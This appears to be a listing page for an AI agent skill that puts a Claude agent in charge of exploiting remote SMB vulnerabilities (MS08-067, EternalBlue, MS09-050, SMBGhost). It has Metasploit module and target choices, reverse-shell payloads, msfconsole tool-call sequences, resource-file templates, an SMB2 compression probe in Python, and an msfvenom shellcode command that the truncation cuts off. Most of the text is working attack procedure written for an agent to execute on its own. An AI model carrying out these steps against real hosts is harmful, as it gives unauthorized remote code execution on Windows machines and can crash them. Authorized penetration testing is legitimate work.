Install

mkdir -p .claude/skills/smb-exploitation && curl -L -o skill.zip "https://agentskills.codes/api/skills/download/16249" && unzip -o skill.zip -d .claude/skills/smb-exploitation && rm skill.zip

Installs to .claude/skills/smb-exploitation

Activation

This is the description your AI agent reads to decide when to run this skill — the better it matches your request, the more reliably it fires.

Exploit remote SMB vulnerabilities for unauthenticated code execution on Windows hosts.
87 chars; no explicit "when" trigger

About this skill

SMB Remote Exploitation

You are helping a penetration tester exploit a confirmed SMB vulnerability for remote code execution. All testing is under explicit written authorization.

Engagement Logging

Check for ./engagement/ directory. If absent, proceed without logging.

When an engagement directory exists:

  • Print [smb-exploitation] Activated → <target> to the screen on activation.
  • Evidence → save significant output to engagement/evidence/ with descriptive filenames (e.g., ms17-010-eternalblue-run.txt, smb-shell-whoami.txt).

Scope Boundary

This skill covers exploitation of a confirmed remote SMB vulnerability (MS08-067, MS09-050, MS17-010, SMBGhost) for unauthenticated code execution: choosing the module, target and payload, running it, and returning the resulting session. Enumeration, authentication attacks and share access are outside it. When you reach the boundary of this scope, whether through completing your methodology or discovering findings outside your domain, STOP.

Do not load or execute another skill. Do not continue past your scope boundary. Instead, return to the orchestrator with:

  • What was found (vulns, credentials, access gained)
  • Context to pass (injection point, target, working payloads, etc.)

The orchestrator decides what runs next. Your job is to execute this skill thoroughly and return clean findings.

Stay in methodology. Only use techniques documented in this skill. If you encounter a scenario not covered here, note it and return — do not improvise attacks, write custom exploit code, or apply techniques from other domains. The orchestrator will provide specific guidance or route to a different skill.

State Management

Call get_state_summary() from the state MCP server to read current engagement state. Use it to:

  • Skip re-testing targets, parameters, or vulns already confirmed
  • Leverage existing credentials or access for this technique
  • Understand what's been tried and failed (check Blocked section)

Your return summary must include:

  • New targets/hosts discovered (with ports and services)
  • New credentials or tokens found
  • Access gained or changed (user, privilege level, method)
  • Vulnerabilities confirmed (with status and severity)
  • Pivot paths identified (what leads where)
  • Blocked items (what failed and why, whether retryable)

Prerequisites

  • SMB vulnerability confirmed via nmap smb-vuln* scripts or equivalent
  • Target OS and architecture identified (critical for target selection)
  • Network access to target port 445
  • Metasploit Framework installed (msfconsole)
  • Listener port available (default 4444, or specify alternative)
  • Attack machine IP reachable from target (check with ip addr show tun0 for VPN, or appropriate interface)

Step 1: Assess

If not already provided by the orchestrator or conversation context, determine:

  1. Which vulnerability? Check engagement state or ask — MS08-067, MS17-010, MS09-050, or SMBGhost
  2. Target OS and architecture? Windows version, service pack, 32-bit vs 64-bit — critical for exploit target selection
  3. Attack machine IP? Run ip -4 addr show tun0 (or appropriate interface) to get the listener address

Vulnerability-to-OS Compatibility Matrix

CVE            Vulnerability           Affected OS                                                                      Notes
CVE-2008-4250  MS08-067                2000 SP4, XP SP0-SP3, Server 2003 SP0-SP2, Vista SP0-SP1, Server 2008 pre-SP2    Most reliable on XP/2003; the Metasploit module only ships 2000/XP/2003 targets
CVE-2009-3103  MS09-050                Vista SP1-SP2, Server 2008 SP1-SP2                                               SMBv2 negotiation bug; x86 targets only
CVE-2017-0144  MS17-010 (EternalBlue)  XP through Server 2016 (unpatched)                                               Bulletin covers CVE-2017-0143 to -0148; unstable on XP/2003 32-bit
CVE-2020-0796  SMBGhost                Windows 10 1903/1909, Server v1903/v1909                                         SMBv3.1.1 compression

Skip this step if the orchestrator already provided this information.

Step 2: Select Exploit and Target

MS08-067 (CVE-2008-4250)

Metasploit module: exploit/windows/smb/ms08_067_netapi

Preferred for Windows XP and Server 2003. More stable than EternalBlue on these older systems.

Target selection — critical for reliability:

Target ID  OS
0          Automatic Targeting
1          Windows 2000 Universal
2          Windows XP SP0/SP1 Universal
3          Windows XP SP2 English (NX)
4          Windows XP SP3 English (NX)
5          Windows 2003 SP0 Universal
6          Windows XP SP2/SP3 English (AlwaysOn NX)
7          Windows 2003 SP1 English (NO NX)
8          Windows 2003 SP1 English (NX)
9          Windows 2003 SP2 English (NO NX)
10         Windows 2003 SP2 English (NX)

Decision logic:

  • If OS is "Windows XP" and SP2 or SP3: use target 6 (handles both, NX-aware)
  • If OS is "Windows XP" and SP0/SP1: use target 2
  • If OS is "Windows 2003" and SP1: use target 8 (NX) or target 7 (no NX)
  • If OS is "Windows 2003" and SP2: use target 10 (NX) or target 9 (no NX)
  • If OS is "Windows 2000": use target 1
  • If unsure about NX: try NX-enabled target first — it works on both, the reverse doesn't
  • If unsure about SP: use target 0 (automatic) — less reliable but attempts fingerprinting
  • For non-English targets: use target 0 (automatic) and note that language-specific targets exist in Metasploit (check show targets for the full list)

Payload selection:

  • Default: windows/shell_reverse_tcp — simple, reliable, no staging issues
  • Alternative: windows/meterpreter/reverse_tcp — more features but staged payload can fail on slow/filtered links
  • If port 4444 is filtered: try 443 or 80 as LPORT

MS17-010 / EternalBlue (CVE-2017-0144; the bulletin covers CVE-2017-0143 through CVE-2017-0148)

Metasploit modules (choose based on target OS):

Module                                         Best for                                                            Notes
exploit/windows/smb/ms17_010_eternalblue       Windows 7, Server 2008 R2, Server 2012, 10, Server 2016 (64-bit)    Primary module, most reliable on 64-bit
exploit/windows/smb/ms17_010_psexec            Windows XP, Server 2003, Vista, 7, 2008 (32- and 64-bit)            Uses named pipes, more stable on 32-bit and older OS
exploit/windows/smb/ms17_010_eternalblue_win8  Windows 8, 8.1, Server 2012                                         Specific Win8+ handling

Decision logic:

  • Windows 7 / Server 2008 R2 / Server 2012 / 10 / Server 2016 (64-bit): use ms17_010_eternalblue — primary module, highest success rate
  • Windows XP / Server 2003 (32-bit): use ms17_010_psexec — the eternalblue module frequently BSODs 32-bit XP. psexec variant uses named pipes and is far more stable. Requires a valid named pipe — common defaults: samr, browser, lsarpc, netlogon, srvsvc
  • Windows Vista / Server 2008 (pre-R2): use ms17_010_psexec
  • Windows 8 / 8.1 / Server 2012: try ms17_010_eternalblue first, fall back to ms17_010_eternalblue_win8

Named pipe selection for psexec variant:

set NAMEDPIPE samr

If samr fails, cycle through: browser, lsarpc, netlogon, srvsvc. Null session access increases success — check engagement state for null auth status.

Payload selection:

  • 64-bit targets: windows/x64/shell_reverse_tcp or windows/x64/meterpreter/reverse_tcp
  • 32-bit targets: windows/shell_reverse_tcp or windows/meterpreter/reverse_tcp

MS09-050 (CVE-2009-3103)

Metasploit module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index

Narrow target range — only Vista SP1/SP2 and Server 2008 SP1/SP2.

Target selection:

Target ID  OS
0          Windows Vista SP1/SP2 and Server 2008 SP1 (x86)

Only 32-bit targets. If target is 64-bit, this exploit won't work — try MS17-010 instead.

SMBGhost (CVE-2020-0796)

Metasploit module: exploit/windows/smb/cve_2020_0796_smbghost

Confirm the path with search cve-2020-0796 in msfconsole before building a resource file around it. The cve_2020_0796_smbghost module Metasploit ships is a local privilege-escalation exploit under exploit/windows/local/; a remote code-execution module under exploit/windows/smb/ may not exist in your install, in which case note it and return to the orchestrator rather than improvising.

Very narrow target range — only Windows 10 v1903/v1909 and Server v1903/v1909 with SMBv3.1.1 compression enabled.

Confirmation (before attempting):

# Confirm the host negotiates SMB 3.1.1, the only dialect that carries compression
nmap -p445 --script smb2-capabilities TARGET_IP

smb2-capabilities lists the dialects and capability flags the server accepts. Compression is negotiated through a negotiate context, not a capability flag, so a 3.1.1 line here shows the dialect is available, not that compression is on; Microsoft's workaround for this CVE (the DisableCompression value under the LanmanServer\Parameters key) turns compression off without changing the dialect.

Stability warning: This exploit targets kernel memory and has a moderate BSOD risk. Always warn before launching.
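Because smb2-capabilities does not show negotiate contexts, here is an added example (written for this page, not part of the skill or of Metasploit) that performs the client half of the SMB2 NEGOTIATE exchange with a compression context and parses the server's reply for its compression context, which is the feature SMBGhost abuses. The wire layout follows MS-SMB2; the client GUID and pre-auth salt are random unless supplied, and build_sample_negotiate_response() is a constructed reply for offline use, not a capture. compression_offered() is a necessary condition only: a host patched in March 2020 still negotiates compression, so pair it with the 1903/1909 build number before selecting the exploit.

```python
import os
import socket
import struct

SMB2_NEGOTIATE = 0x0000
DIALECT_311 = 0x0311
CTX_PREAUTH_INTEGRITY = 0x0001      # negotiate context types, MS-SMB2 2.2.3.1
CTX_COMPRESSION = 0x0003
COMPRESSION_NAMES = {1: "LZNT1", 2: "LZ77", 3: "LZ77+Huffman", 4: "Pattern_V1"}


def _smb2_header(command):
    # ProtocolId, StructureSize, CreditCharge, Status, Command, CreditRequest,
    # Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
    return struct.pack("<4sHHIHHIIQIIQ16s", b"\xfeSMB", 64, 0, 0, command,
                       1, 0, 0, 0, 0, 0, 0, b"\x00" * 16)

def _context(ctx_type, data):
    return struct.pack("<HHI", ctx_type, len(data), 0) + data   # type, length, reserved, data

def _pad8(buf):
    return buf + b"\x00" * (-len(buf) % 8)

def build_negotiate_request(client_guid=None, salt=None):
    """NetBIOS-framed NEGOTIATE offering dialects 2.0.2 to 3.1.1, a pre-auth
    integrity context (mandatory with 3.1.1) and a compression context (LZNT1)."""
    dialects = [0x0202, 0x0210, 0x0300, 0x0302, DIALECT_311]
    client_guid = client_guid or os.urandom(16)
    salt = salt or os.urandom(32)
    preauth = _context(CTX_PREAUTH_INTEGRITY,
                       struct.pack("<HHH", 1, len(salt), 0x0001) + salt)    # SHA-512
    compression = _context(CTX_COMPRESSION,
                           struct.pack("<HHIH", 1, 0, 0, 0x0001))            # count, pad, flags, LZNT1
    contexts = _pad8(preauth) + compression
    # NegotiateContextOffset counts from the SMB2 header start and is 8-byte aligned
    fixed_end = 64 + 36 + 2 * len(dialects)
    ctx_offset = fixed_end + (-fixed_end % 8)
    body = struct.pack("<HHHHI16sIHH", 36, len(dialects), 0x0001, 0, 0x7F,
                       client_guid, ctx_offset, 2, 0)
    body += struct.pack("<%dH" % len(dialects), *dialects)
    body += b"\x00" * (ctx_offset - fixed_end) + contexts
    msg = _smb2_header(SMB2_NEGOTIATE) + body
    return struct.pack(">I", len(msg)) + msg     # NetBIOS session header: type 0 + 3-byte length

def parse_negotiate_response(raw):
    """Parse a NEGOTIATE response (NetBIOS header stripped): dialect + offered compression."""
    if raw[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    status, command = struct.unpack_from("<IH", raw, 8)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError("command %#x, status %#010x" % (command, status))
    fields = struct.unpack_from("<HHHH16sIIIIQQHHI", raw, 64)
    dialect, ctx_count, ctx_off = fields[2], fields[3], fields[13]
    info = {"dialect": dialect, "compression": []}
    if dialect != DIALECT_311:
        return info                              # negotiate contexts only exist for 3.1.1
    off = ctx_off
    for _ in range(ctx_count):
        ctx_type, data_len = struct.unpack_from("<HH", raw, off)
        data = raw[off + 8:off + 8 + data_len]
        if ctx_type == CTX_COMPRESSION:          # count(2) pad(2) flags(4) algorithms(2 each)
            count = struct.unpack_from("<H", data, 0)[0]
            algs = struct.unpack_from("<%dH" % count, data, 8)
            info["compression"] = [COMPRESSION_NAMES.get(a, "%#06x" % a) for a in algs]
        off += 8 + data_len
        off += -off % 8                          # next context is 8-byte aligned
    return info

def compression_offered(info):
    """Necessary for SMBGhost, not sufficient: patched 1903/1909 still advertises compression."""
    return info["dialect"] == DIALECT_311 and bool(info["compression"])

def build_sample_negotiate_response(dialect, compression_algs=()):
    """Constructed server reply for offline testing; not a capture."""
    sec_blob = b"\x60\x00"                       # stands in for the SPNEGO token
    ctx_list = []
    if dialect == DIALECT_311:
        ctx_list.append(_context(CTX_PREAUTH_INTEGRITY,
                                 struct.pack("<HHH", 1, 32, 0x0001) + b"\x11" * 32))
        if compression_algs:
            n = len(compression_algs)
            ctx_list.append(_context(CTX_COMPRESSION,
                                     struct.pack("<HHI%dH" % n, n, 0, 0, *compression_algs)))
    sb_off = 64 + 64                             # security buffer follows the 64 fixed bytes
    ctx_off = (sb_off + len(sec_blob) + 7) // 8 * 8 if ctx_list else 0
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, 0x0001, dialect, len(ctx_list),
                       b"\x22" * 16, 0x2F, 0x800000, 0x800000, 0x800000, 0, 0,
                       sb_off, len(sec_blob), ctx_off) + sec_blob
    if ctx_list:
        body += b"\x00" * (ctx_off - 64 - len(body))
        body += b"".join(_pad8(c) for c in ctx_list[:-1]) + ctx_list[-1]
    return _smb2_header(SMB2_NEGOTIATE) + body

def probe(host, port=445, timeout=5):
    """Run the exchange against a live host and return the parsed reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        data, want = b"", None
        while want is None or len(data) < 4 + want:
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("short read from %s" % host)
            data += chunk
            if want is None and len(data) >= 4:
                want = int.from_bytes(data[1:4], "big")
    return parse_negotiate_response(data[4:4 + want])
```

probe("TARGET_IP") is the only function that touches the network; everything else runs offline against the constructed reply. A dialect below 3.1.1 or an empty compression list means the SMBGhost module is the wrong choice regardless of what the version banner says.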

Step 3: Generate and Execute

Interactive Metasploit via start_process (Preferred)

Spawn msfconsole in a persistent PTY via the shell-server MCP. This lets the agent drive Metasploit interactively — configure the exploit, run it, and interact with the resulting session through send_command calls.

# 1. Spawn msfconsole
start_process(command="msfconsole -q", label="msfconsole-eternalblue")

# 2. Configure and run (via send_command with expect patterns)
send_command(session_id=..., command="use <MODULE>", expect="msf6 exploit")
send_command(session_id=..., command="set RHOSTS <TARGET_IP>")
send_command(session_id=..., command="set LHOST <ATTACK_IP>")
send_command(session_id=..., command="set LPORT <PORT>")
send_command(session_id=..., command="set TARGET <TARGET_ID>")
send_command(session_id=..., command="set PAYLOAD <PAYLOAD>")
send_command(session_id=..., command="run", timeout=60, expect="session \\d+ opened")

For the MS17-010 psexec variant, also send: set NAMEDPIPE samr
For SMBGhost, also send: set PROCESSOR_ARCHITECTURE x64

When Metasploit catches the shell, it lives inside the same PTY session. The agent interacts with the Meterpreter/cmd session through the same send_command calls — no port conflict, no DisablePayloadHandler needed.

Resource File Approach (Fallback)

If start_process is unavailable or msfconsole needs to be run outside the MCP, generate a resource file:

Template (adapt per exploit selection from Step 2):

cat > temp_smb-exploit.rc << 'RCEOF'
use <MODULE>
set RHOSTS <TARGET_IP>
set LHOST <ATTACK_IP>
set LPORT <PORT>
set TARGET <TARGET_ID>
set PAYLOAD <PAYLOAD>
run
RCEOF

For MS17-010 psexec variant, add:

set NAMEDPIPE samr

For SMBGhost, add:

set PROCESSOR_ARCHITECTURE x64

Execution: Present the resource file contents to the user and instruct:

msfconsole -q -r temp_smb-exploit.rc
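An added example (not part of the skill) that renders the resource file above from the Step 2 selection and refuses the combinations this page says cannot work: an x64 payload against the x86-only MS08-067 and MS09-050 modules, a 32-bit payload with ms17_010_eternalblue, and ms17_010_psexec without a NAMEDPIPE. Module, option and payload names are the ones listed on this page; the validation rules and the check() helper are this example's own, and the 10.10.x.x addresses are placeholders.

```python
import ipaddress

# Per-module constraints taken from the Step 2 decision logic on this page:
# the payload architecture the module is paired with and the extra option it needs.
MODULES = {
    "exploit/windows/smb/ms08_067_netapi": ("x86", None),
    "exploit/windows/smb/ms09_050_smb2_negotiate_func_index": ("x86", None),
    "exploit/windows/smb/ms17_010_eternalblue": ("x64", None),
    "exploit/windows/smb/ms17_010_eternalblue_win8": (None, None),
    "exploit/windows/smb/ms17_010_psexec": (None, "NAMEDPIPE"),
    "exploit/windows/smb/cve_2020_0796_smbghost": ("x64", "PROCESSOR_ARCHITECTURE"),
}
COMMON_PIPES = ("samr", "browser", "lsarpc", "netlogon", "srvsvc")


def payload_arch(payload):
    """Metasploit x64 Windows payloads live under windows/x64/; the rest are x86."""
    return "x64" if payload.startswith("windows/x64/") else "x86"

def render_rc(module, rhosts, lhost, lport, payload, target=0, namedpipe=None):
    """Return the resource file text, or raise ValueError for a combination the skill rules out."""
    if module not in MODULES:
        raise ValueError("module is not one this skill uses: %s" % module)
    arch, extra = MODULES[module]
    if not str(rhosts).strip():
        raise ValueError("RHOSTS is empty")
    ipaddress.ip_address(lhost)                     # ValueError unless it is an IP literal
    if not 1 <= int(lport) <= 65535:
        raise ValueError("LPORT out of range: %s" % lport)
    if arch and payload_arch(payload) != arch:
        raise ValueError("%s is paired with %s payloads, got %s" % (module, arch, payload))
    if extra == "NAMEDPIPE" and not namedpipe:
        raise ValueError("ms17_010_psexec needs NAMEDPIPE (common: %s)" % ", ".join(COMMON_PIPES))
    lines = ["use %s" % module, "set RHOSTS %s" % rhosts, "set LHOST %s" % lhost,
             "set LPORT %d" % int(lport), "set TARGET %d" % int(target),
             "set PAYLOAD %s" % payload]
    if extra == "NAMEDPIPE":
        lines.append("set NAMEDPIPE %s" % namedpipe)
    elif extra == "PROCESSOR_ARCHITECTURE":
        lines.append("set PROCESSOR_ARCHITECTURE x64")
    lines.append("run")
    return "\n".join(lines) + "\n"

def check(**kwargs):
    """Return None if render_rc accepts the arguments, else the error message."""
    try:
        render_rc(**kwargs)
        return None
    except ValueError as exc:
        return str(exc)

def write_rc(path, **kwargs):
    """Write the file that `msfconsole -q -r <path>` will consume and return its text."""
    text = render_rc(**kwargs)
    with open(path, "w") as fh:
        fh.write(text)
    return text
```

write_rc("temp_smb-exploit.rc", module=..., rhosts=..., lhost=..., lport=..., payload=...) produces the same file as the heredoc above; the difference is that a payload/module architecture mismatch or a missing pipe name fails here instead of as a silent exploit failure or a BSOD on the target.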

Standalone Exploits (When Metasploit Is Unavailable)

If Metasploit is not available, standalone Python exploits exist:

MS17-010 (AutoBlue):

# Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACK_IP> LPORT=

---

*Content truncated.*
